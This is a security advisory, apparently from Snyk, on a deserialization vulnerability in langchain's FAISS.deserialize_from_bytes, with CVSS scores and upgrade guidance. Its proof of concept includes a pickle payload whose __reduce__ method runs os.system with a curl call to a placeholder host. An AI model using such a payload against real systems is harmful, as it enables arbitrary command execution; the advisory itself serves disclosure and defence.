Deserialization of Untrusted Data Affecting langchain package, versions [,0.2.10)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PYTHON-LANGCHAIN-8023176
  • published 18 Sep 2024
  • disclosed 17 Sep 2024
  • credit Panda

How to fix?

Upgrade langchain to version 0.2.10 or higher.

Overview

langchain is a Building applications with LLMs through composability

Affected versions of this package are vulnerable to Deserialization of Untrusted Data through the FAISS.deserialize_from_bytes function. An attacker can execute arbitrary commands by exploiting the os.system function.

Note:

Exploiting this vulnerability requires that the user actively accept untrusted input from another source.

PoC

Serialized object:

import pickle
import os
import base64

class Test(object): def init(self): self.a = 1

def __reduce__(self):
    return (os.system, ('curl http://example.com/test',))

if name == 'main': tmp = Test() data = pickle.dumps(tmp) print(base64.b64encode(data))

import base64
from langchain_community.embeddings.huggingface import HuggingFaceEmbeddings
from langchain_community.vectorstores import FAISS
embeddings = HuggingFaceEmbeddings(model_name="all-MiniLM-L6-v2")
db = FAISS.deserialize_from_bytes(
    embeddings=embeddings, serialized=base64.b64decode(b'This is the serialized data after base64')
) 

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

References

CVSS Scores

version 4.0
version 3.1
Expand this section

Snyk

Recommended
4.4 medium
  • Attack Vector (AV)
    Physical
  • Attack Complexity (AC)
    Low
  • Attack Requirements (AT)
    Present
  • Privileges Required (PR)
    Low
  • User Interaction (UI)
    Active
  • Confidentiality (VC)
    High
  • Integrity (VI)
    Low
  • Availability (VA)
    Low
  • Confidentiality (SC)
    None
  • Integrity (SI)
    None
  • Availability (SA)
    None